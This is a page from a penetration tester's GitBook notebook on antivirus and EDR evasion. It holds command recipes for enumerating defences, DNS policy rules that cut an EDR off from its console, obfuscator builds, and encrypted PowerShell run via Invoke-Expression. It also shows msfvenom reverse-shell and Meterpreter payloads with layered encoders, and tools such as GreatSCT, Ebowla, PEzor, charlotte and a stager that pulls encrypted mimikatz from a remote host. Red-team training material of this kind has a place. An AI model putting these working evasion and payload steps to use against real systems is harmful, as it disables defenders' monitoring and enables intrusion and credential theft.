Pentester's Promiscuous Notebook
TwitterGitHubBlog
  • README
  • ⚒️Pentest
    • C2
      • Covenant
      • Empire
      • Havoc
      • Meterpreter
      • PoshC2
      • Sliver
    • Infrastructure
      • AD
        • ACL Abuse
        • AD CS Abuse
          • dNSHostName Spoofing (Certifried)
          • ESC1
          • ESC4
          • ESC8
          • ESC15
          • Golden Certificate
          • Pass-the-Certificate
        • ADIDNS Abuse
        • Attack Trusts
        • Attack RODCs
        • AV / EDR Evasion
          • .NET Assembly
            • .NET Config Loader
            • .NET Dynamic API Invocation
            • .NET In-Memory Assembly
            • .NET Reflective Assembly
          • AMSI Bypass
          • Application Whitelist Bypass
          • AppLocker Bypass
          • BYOVD
          • CLM Bypass
          • Defender
          • ETW Block
          • Execution Policy Bypass
          • Mimikatz
          • UAC Bypass
        • Authentication Coercion
        • BadSuccessor
        • Credentials Harvesting
          • From Memory
            • lsass.exe
            • svchost.exe
          • Credential Phishing
          • DCSync
          • DPAPI
          • KeePass
          • Linux
          • LSA
          • NetSync
          • NPLogonNotify
          • NTDS
          • Password Filter
          • RDP
          • SAM
          • SSH Clients
          • SSPI
        • Discovery
        • DnsAdmins
        • Dominance
        • GPO Abuse
        • Kerberos
          • Delegation Abuse
            • Constrained
            • Resource-based Constrained
            • Unconstrained
          • Kerberos Relay
          • Roasting
        • Key Credentials Abuse
        • LAPS
        • Lateral Movement
          • DCOM
          • Overpass-the-Hash
          • Pass-the-Hash
          • Pass-the-Ticket
          • RDP
          • RPC
          • RunAs
          • SMB
          • SPN-jacking
          • WinRM / PSRemoting
          • WMI
        • LDAP
        • NTLM
          • NTLM Relay
          • NTLMv1 Downgrade
        • Password Spraying
        • Post Exploitation
        • Pre-created Computers Abuse
        • PrivExchange
        • Privileges Abuse
          • SeBackupPrivilege & SeRestorePrivilege
          • SeImpersonatePrivilege
            • Potatoes
            • PrintSpoofer
          • SeTrustedCredmanAccess
        • RID Cycling
        • SCCM Abuse
        • SMB
        • Token Manipulation
        • User Hunt
        • WSUS
        • Zerologon
      • Azure AD
        • On-Prem ↔ Cloud
          • Cloud → On-Prem
          • On-Prem → Cloud
        • PRT Abuse
      • DevOps
        • Ansible
        • Artifactory
        • Atlassian
        • Containerization / Orchestration
        • GitLab
        • HashiCorp Vault
        • Jenkins
        • VS Code
        • Zabbix
      • DBMS
        • FireBird
        • MS SQL
        • MySQL / MariaDB
        • Oracle
        • Redis
        • SQLite
      • Authentication Brute Force
      • File Transfer
      • IPMI
      • Kiosk Breakout
      • Low-Hanging Fruits
      • LPE
      • Networks
        • L2
          • ARP Spoofing
          • DHCPv6 Spoofing
          • LLMNR / NBNS Poisoning
          • SNACs Abuse
          • VLAN Hopping
        • NAC Bypass
        • Scanning
        • SIP / VoIP
        • Sniff Traffic
      • NFS
      • Persistence
      • Pivoting
      • Post Exploitation
      • SNMP
      • SSH
      • TFTP
      • VNC
    • OSINT
      • Shodan
    • Password Brute Force
      • Generate Wordlists
    • Perimeter
      • 1C
      • ADFS
      • Cisco
      • DNS
      • Exchange
      • Information Gathering
      • IPSec
      • Java RMI
      • Log4j / Log4Shell
      • Lync & Skype for Business
      • NTP
      • Outlook
      • OWA
      • SharePoint
      • SMTP
      • SSH
      • Subdomain Takeover
    • Shells
      • Reverse Shells
      • Web Shells
    • Web
      • 2FA Bypass
      • LFI / RFI
      • SOP / CORS
      • SQLi
      • WAF
      • WordPress
      • XSS
    • Wi-Fi
      • WPA / WPA2
        • Enterprise
        • Personal
  • ⚔️Red Team
    • Basics
    • Cobalt Strike
      • UDRL
    • Infrastructure
    • MalDev
      • API Hashing
      • API Hooking
      • BOF / COFF
      • CFG
      • Code Injection
        • DLL Injectors
        • Process Hollowing
        • Process Injectors
        • Shellcode Runners
      • DLL Hijacking
      • Golang
      • Kernel Mode
      • PIC / Shellcode
      • Nim
      • Sandbox Evasion
      • Syscalls
      • Windows API
    • SE
      • Phishing
        • HTML Smuggling
        • MS Office
        • Rogue RDP
  • 🐞Exploit Dev
    • BOF
      • OSCP BOF
      • OSED SEH Overflow
    • RE
    • WinDbg
  • ⚙️Admin
    • Git
    • Linux
      • Kali
    • Networking
      • DHCP Server & Linux Hotspot
      • Quick Configurations
      • Routing
      • WireGuard
    • Virtualization
      • Docker
      • Hyper-V
      • VirtualBox
      • VMWare
    • Windows
Powered by GitBook
On this page
  • Toy EDRs
  • Recon
  • Attacking EDRs
  • EDRPrison
  • Name Resolution Policy Table
  • EDR Blindspots
  • Bring Your Own Interpreter (BYOI)
  • Backdoor Electron Applications (JavaScript)
  • PE Obfuscation
  • OLLVM
  • TinyCC
  • String Encryption
  • Tools
  • PowerShell Tactics
  • PowerShell Obfuscation
  • Tools
  • msfvenom
  • Veil-Evasion
  • GreatSCT
  • Ebowla
  • PEzor
  • inceptor
  • ScareCrow
  • charlotte
  • MeterPwrShell
  • stager_libpeconv
  1. Pentest
  2. Infrastructure
  3. AD

AV / EDR Evasion

Last updated 1 month ago

BypassAV Mindmap

Toy EDRs

Recon

Search for active AV processes on hosts (local admin priveleges required):

Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}

Identify Microsoft.NET version from inspecting assembly properties:

PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion

Identify Microsoft.NET version from querying the registry:

PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release

Windows build <-> default .NET Framework version associations:

Windows Build
Default .NET Framework Version

1511

4.6.1

1607

4.6.2

1703

4.7

1709

4.7.1

1803

4.7.2

1909+

4.8

.NET Framework version <-> CLR version associations:

.NET Framework Version
CLR Version

2.0, 3.0, 3.5

2

4, 4.5-4.8

4

Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the above relationship between .NET Framework version and CLR version, i. e. all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.

Potential scan exclusions:

  • C:\Windows\System32\LogFiles\

  • C:\Windows\System32\inetsrv\

  • C:\Windows\ClusterStorage\

  • C:\ProgramData\Microsoft\Windows\Hyper-V\

Attacking EDRs

EDRPrison

WinDivert

.NET:

Python:

Name Resolution Policy Table

Add rule:

PS > Add-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" -NameServers 127.0.0.1 -Comment "MegaCorp EDR Web Panel"
PS > Clear-DnsClientCache -Confirm:$false

Remove rule:

PS > Get-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" | Remove-DnsClientNrptRule -PassThru -Confirm:$false -Force

EDR Blindspots

Bring Your Own Interpreter (BYOI)

Python

Pyramid

BOFs with Python

Python RDI

Backdoor Electron Applications (JavaScript)

PE Obfuscation

OLLVM

apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build

TinyCC

PS > curl https://download.savannah.gnu.org/releases/tinycc/tcc-0.9.27-win64-bin.zip -o tcc.zip
PS > Expand-Archive .\tcc.zip -DestinationPath .
PS > rm tcc.zip; cd tcc
PS > curl https://github.com/DosX-dev/obfus.h/raw/refs/heads/main/include/obfus.h -o obfus.h
PS > curl https://download.savannah.gnu.org/releases/tinycc/winapi-full-for-0.9.27.zip -o tcc-winapi.zip
PS > Expand-Archive .\tcc-winapi.zip -DestinationPath .
PS > rm tcc-winapi.zip
PS > Copy-Item -Path .\winapi-full-for-0.9.27\include\* -Destination .\include\ -Recurse -Force
PS > .\tcc.exe -w -DVIRT -DCFLOW_V2 -DANTIDEBUG_V2 -o msgbox.exe msgbox.c -luser32

String Encryption

Tools

PowerShell Tactics

PowerShell Obfuscation

Invoke-Obfuscation

Out-EncryptedScript.ps1

PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec

PowerShellArmoury

PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex

Tools

msfvenom

$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe

Veil-Evasion

Hyperion + Pescramble

$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe

GreatSCT

Install and generate a payload:

$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}

$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Exec with msbuild.exe and get a shell:

PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml

Ebowla

$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
...Edit output_type, payload_type, clean_output, [[ENV_VAR]]...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe

PEzor

Wrap executable into PEzor:

$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2

inceptor

ScareCrow

charlotte

$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>

MeterPwrShell

$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate

stager_libpeconv

$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe

Install LLVM 13.x obfuscator based on and :

⚒️
https://xacone.github.io/BestEdrOfTheMarket.html
https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
https://github.com/Helixo32/CrimsonEDR
https://github.com/0xflux/Sanctum
https://github.com/ethereal-vx/Antivirus-Artifacts
https://github.com/Mr-Un1k0d3r/EDRs
https://mansk1es.gitbook.io/edr-binary-abuse/
https://xss.is/threads/67718/
https://www.safebreach.com/blog/dark-side-of-edr-offensive-tool/
https://www.alteredsecurity.com/post/when-the-hunter-becomes-the-hunted-using-custom-callbacks-to-disable-edrs
https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
https://www.3nailsinfosec.com/post/edrprison-borrow-a-legitimate-driver-to-mute-edr-agent
https://github.com/senzee1984/EDRPrison
https://tierzerosecurity.co.nz/2024/07/23/edr-telemetry-blocker.html
https://reqrypt.org/windivert-doc.html
https://github.com/basil00/Divert/wiki/WinDivert-Documentation
https://github.com/TechnikEmpire/WinDivertSharp
https://github.com/xljiulang/WindivertDotnet
https://github.com/ffalcinelli/pydivert
https://github.com/shuxin/pydivert
https://github.com/xshiraori/PyDivert2
https://cloudbrothers.info/en/edr-silencers-exploring-methods-block-edr-communication-part-1/
https://synzack.github.io/Bring-Your-Own-Interpreter/
https://github.com/hakril/PythonForWindows
https://trustedsec.com/blog/operating-inside-the-interpreted-offensive-python
https://github.com/Teach2Breach/rpeloader
https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html
https://github.com/naksyn/Pyramid
https://github.com/naksyn/Embedder
https://gist.github.com/snovvcrash/39263ccae8e07210c3f87c9472b4c908
https://github.com/rkbennett/pybof
https://tishina.in/execution/python-inmemory-bof
https://github.com/zimnyaa/inmembof.py
https://github.com/ELMERIKH/PyinMemoryPE
https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter/source/extensions/python
https://github.com/n1nj4sec/pupy/tree/unstable/client/sources
https://www.ibm.com/think/x-force/bypassing-windows-defender-application-control-loki-c2
https://github.com/boku7/Loki
https://blog.es3n1n.eu/posts/obfuscator-pt-1
https://0xpat.github.io/Malware_development_part_6/
https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec
https://github.com/icyguider/Shhhloader
https://hub.docker.com/repository/docker/snovvcrash/ollvm13
https://github.com/jonpalmisc/limoncello
heroims/obfuscator
tpoechtrager/wclang
https://bellard.org/tcc/
https://github.com/DosX-dev/obfus.h
https://gist.github.com/EvanMcBroom/ad683e394f84b623da63c2b95f6fb547
https://github.com/skadro-official/skCrypter
https://github.com/trustedsec/The_Shelf/blob/main/POC/impacketremoteshell/RemoteMaint/stringobf.h
https://github.com/Evi1Grey5/Bypass-Smartscreen-/blob/main/obfuscate.h
https://github.com/mike1k/perses
https://github.com/weak1337/Alcatraz
https://github.com/es3n1n/obfuscator
https://github.com/d35ha/CallObfuscator
https://github.com/ac3ss0r/obfusheader.h
https://github.com/EgeBalci/deoptimizer
https://github.com/DosX-dev/Astral-PE
https://github.com/specterops/at-ps
https://telegra.ph/Komandy-PowerShell-dlya-pentesterov-03-01
https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation
https://github.com/t3l3machus/PowerShell-Obfuscation-Bible
https://github.com/tokyoneon/Chimera
https://github.com/klezVirus/chameleon
https://github.com/AdrianVollmer/PowerHub
https://github.com/danielbohannon/Invoke-Obfuscation
https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide
https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-EncryptedScript.ps1
https://powersploit.readthedocs.io/en/latest/ScriptModification/Out-EncryptedScript/
https://github.com/cfalta/PowerShellArmoury
https://cyberstoph.org/posts/2019/12/evading-anti-virus-with-powershell-armoury/
https://cyberstoph.org/posts/2020/02/psarmoury-1.4-now-with-even-more-armour/
https://github.com/GreatSCT/GreatSCT
https://github.com/phra/PEzor
https://klezvirus.github.io/RedTeaming/AV_Evasion/CodeExeNewDotNet/
https://github.com/klezVirus/inceptor
https://github.com/optiv/ScareCrow
https://www.grahamhelton.com/blog/scarecrow/
https://adamsvoboda.net/evading-edr-with-scarecrow/
https://github.com/9emin1/charlotte
https://github.com/cepxeo/dll4shell
https://github.com/GetRektBoy724/MeterPwrShell/releases
https://raikia.com/tool-powershell-encoder/
https://github.com/tothi/stager_libpeconv
https://github.com/hasherezade/libpeconv
https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
https://codeby.net/threads/meterpreter-snova-v-dele-100-fud-with-metasploit-5.66730/
https://github.com/phackt/stager.dll
https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
https://xakep.ru/2020/12/23/shikata-ga-nai/
https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/
https://blog.sunggwanchoi.com/creating-a-loader-poc-using-various-languages/
https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
https://xakep.ru/2021/07/23/detection-bypassing/
https://zen.yandex.ru/media/id/5d4f02da027a1500ad43866f/obhodim-antivirusy-kriptor-net-prilojenii-5fc6a199a8f33a1036140386
https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity.html